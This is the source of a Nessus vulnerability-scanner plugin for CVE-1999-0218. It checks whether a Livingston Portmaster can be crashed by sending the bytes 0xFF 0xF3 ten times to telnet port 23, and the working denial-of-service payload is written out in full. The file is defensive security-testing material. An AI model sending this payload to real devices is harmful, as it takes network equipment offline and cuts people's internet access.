home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pmcrash.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  99 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10182);
  10.  script_bugtraq_id(2225);
  11.  script_version ("$Revision: 1.15 $");
  12.  script_cve_id("CVE-1999-0218");
  13.  name["english"] = "Livingston Portmaster crash";
  14.  name["francais"] = "Crash de Livingston Portmaster";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. It was possible to crash the remote
  19. Livingston portmaster by overflowing
  20. its buffers by sending several times
  21. the two chars :
  22.  
  23.     0xFF 0xF3
  24.  
  25.  
  26. An attacker may use this flaw to prevent you
  27. to use your internet access.
  28.  
  29. Solution : Contact your vendor for a patch.
  30.  
  31. Risk factor : High";
  32.  
  33.  desc["francais"] = "
  34. Il s'est avΘrΘ possible de tuer 
  35. le Livingston Portmaster distant en 
  36. dΘpassant ses buffers en lui envoyant
  37. plusieurs fois les deux caractΦres :
  38.  
  39.     0xFF 0xF3
  40.     
  41. Un pirate peut utiliser ce problΦme pour
  42. vous empecher d'avoir accΦs α internet.
  43.  
  44. Solution : Contactez votre vendeur pour un
  45. patch.
  46.  
  47. Facteur de risque : ElevΘ.";
  48.  
  49.  script_description(english:desc["english"], francais:desc["francais"]);
  50.  
  51.  summary["english"] = "Crashes the remote portmaster";
  52.  summary["francais"] = "Plante le portmaster distant";
  53.  script_summary(english:summary["english"], francais:summary["francais"]);
  54.  
  55.  script_category(ACT_KILL_HOST);
  56.  
  57.  
  58.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  59.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  60.  family["english"] = "Denial of Service";
  61.  family["francais"] = "DΘni de service";
  62.  script_family(english:family["english"], francais:family["francais"]);
  63.  
  64.  script_require_ports(23);
  65.  exit(0);
  66. }
  67.  
  68. #
  69. # The script code starts here
  70. #
  71.  
  72.  
  73. crp = raw_string(0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3, 0xFF, 0xF3);
  74.  
  75. port = 23;
  76.  
  77. if(get_port_state(port))
  78. {
  79.  soc = open_sock_tcp(port);
  80.  if(soc)
  81.  {
  82.   #
  83.   # Send the crap ten times
  84.   # 
  85.   
  86.   start_denial();
  87.   send(socket:soc, data:crp, length:10) x 10;
  88.   
  89.   close(soc);
  90.   
  91.   alive = end_denial();
  92.   
  93.   if(!alive){
  94.                 set_kb_item(name:"Host/dead", value:TRUE);
  95.                 security_hole(0);
  96.                 }
  97.   }
  98. }
  99.